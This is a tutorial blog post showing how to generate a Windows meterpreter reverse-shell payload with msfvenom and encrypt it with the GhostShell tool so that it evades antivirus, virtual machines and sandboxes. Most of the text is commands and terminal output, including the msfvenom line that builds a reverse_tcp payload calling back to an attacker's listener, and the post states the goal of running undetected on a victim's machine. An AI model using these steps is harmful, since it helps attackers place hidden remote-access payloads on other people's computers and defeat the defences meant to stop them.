Generate Shellcode to Bypass the AVs, VMs, and Sandboxes

Introduction

Shellcode, the next phase of successfully finding exploit. Every hackers needs shellcode to compromise the target, your shellcode decides of how much you get control of the victim. Even shellcode encryption plays a big role in hiding malware from Antivirus, VMs and Sandboxes.

Today we will walk you through the technique to encrypt your shellcode and similar techniques are used by researcher of International institute of Cyber Security to test malware’s in labs.

Environment

  • OS: Kali Linux 2019.3 64bit
  • Kernel-Version: 5.2.0

Installation Steps

root@kali:/home/iicybersecurity# git clone https://github.com/ReddyyZ/GhostShell
Cloning into 'GhostShell'...
remote: Enumerating objects: 27, done.
remote: Counting objects: 100% (27/27), done.
remote: Compressing objects: 100% (27/27), done.
remote: Total 185 (delta 15), reused 0 (delta 0), pack-reused 158
Receiving objects: 100% (185/185), 4.49 MiB | 1.60 MiB/s, done.
Resolving deltas: 100% (91/91), done.
  • Use the cd command to enter into ghostshell directory.
root@kali:/home/iicybersecurity# cd GhostShell/
root@kali:/home/iicybersecurity/GhostShell#
  • We use msfvenom to generate and output different types of shellcode and it is a command-line interface.
  • Now, let’s generate shellcode using msfvenom. Use this command to generate shellcode.
    • msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.109 lport=80 -f c
GhostShell - Shell code
GhostShell – Shell code
  • We successfully generated shellcode
  • Now, use this command to compile the github project code file.
    • gcc -m32 -fno-stack-protector -z execstack encrypt_shellcode.c -o encrypt_shellcode
  • After, using this command it generates encrypt_shellcode file. Use ls command to view the file.
root@kali:/home/iicybersecurity/GhostShell# gcc -m32 -fno-stack-protector -z execstack encrypt_shellcode.c -o encrypt_shellcode
root@kali:/home/iicybersecurity/GhostShell# ls
assets encrypt_shellcode encrypt_shellcode.c LICENSE main.c main.h README.md
  • Lets assume that the below is our shellcode.
\x70\xff\xff\xff\xe9\x9b\xff\xff\xff\x01\xc3\x29\xc6\x75\xc1
  • Now, we can encrypt the shellcode using this command
    • Command Format: ./ encrypt_shellcode e “key” “shellcode”
    • e: encypt the shellcode
    • key: \xde\xad\xbe\xef
root@kali:/home/iicybersecurity/GhostShell# ./encrypt_shellcode e "\xde\xad\xbe\xef" "\x70\xff\xff\xff\xe9\x9b\xff\xff\xff\x01\xc3\x29\xc6\x75\xc1"
Encrypted: \x4e\xac\xbd\xee\xc7\x48\xbd\xee\xdd\xad\x81\x18\xa4\x22\x7f
  • Now, we can decrypt the shellcode using this command
    • Command Format: ./ encrypt_shellcode d “key” “shellcode”
    • D: Decypt the shellcode
root@kali:/home/iicybersecurity/GhostShell# ./encrypt_shellcode d "\xde\xad\xbe\xef" "\x4e\xac\xbd\xee\xc7\x48\xbd\xee\xdd\xad\x81\x18\xa4\x22\x7f"
Decrypted: \x70\xff\xff\xff\xe9\x9b\xff\xff\xff\x01\xc3\x29\xc6\x75\xc1

Conclusion

We saw how we encrypt and decrypt the shellcode using the unique key. If the shellcode executes on the victim’s machine it is undetected on the remote machine.